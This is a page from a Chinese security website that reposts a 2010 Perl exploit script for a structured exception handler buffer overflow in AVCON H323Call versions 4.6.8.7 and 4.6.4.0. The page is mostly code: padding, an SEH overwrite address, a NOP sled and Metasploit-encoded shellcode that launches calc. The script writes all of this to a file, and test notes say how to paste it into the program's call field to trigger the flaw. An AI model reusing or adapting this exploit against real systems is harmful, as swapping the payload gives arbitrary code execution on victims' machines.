首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AVCON H323Call Buffer Overflow
来源:http://twitter.com/D1N 作者:Beresford 发布时间:2010-05-10  

#!/usr/bin/perl

# Exploit Title: AVCON H323Call Buffer Overflow
# Date: 5/9/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Versions: 4.6.8.7 | 4.6.4.0
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Download: http://meeting.bjhr.gov.cn/avcon/avcon.exe
# Download: http://meeting.cei.gov.cn/avcon/avcon.exe

my $exploit = "poc.txt";

## EDB Test Notes:
## Software can be installed as English.  Once installed, go to "Start" -> "AVCON4" -> select H323 Call
## or just run "H323Call.exe" located inside installation folder,
## copy and paste the exploit (string) to the input field (there's only one),
## and click on "call". (this is a different flaw in the software package affects H323Call).

my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x08\x90\x90";
my $SEH = pack('V',0x1005FE29);
my $nops = "\x90" x 25;
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "E" x 5000;
my $payload = $junk.$nSEH.$SEH.$nops.$buf.$padding;

open (myfile,">$exploit");
print myfile $payload;
close (myfile);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ESET Smart Security 4.2 / NOD3
·GeoHttpServer Remote DoS Vulne
·TFTPGUI v1.4.5 Long Transport
·IDEAL Migration v4.5.1 Buffer
·phpscripte24 Shop System SQL I
·Dolphin 2.0 (.elf) Local Danie
·Alibaba Clone Version <= 3.0 (
·Xitami / 5.0a0 Denial Of Servi
·Microsoft Windows SMB2 negotia
·Netvidade engine v1.0 Multiple
·AVCON version 4.6.8.7 local bu
·Hyplay 1.2.0326.1 (.asx) Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved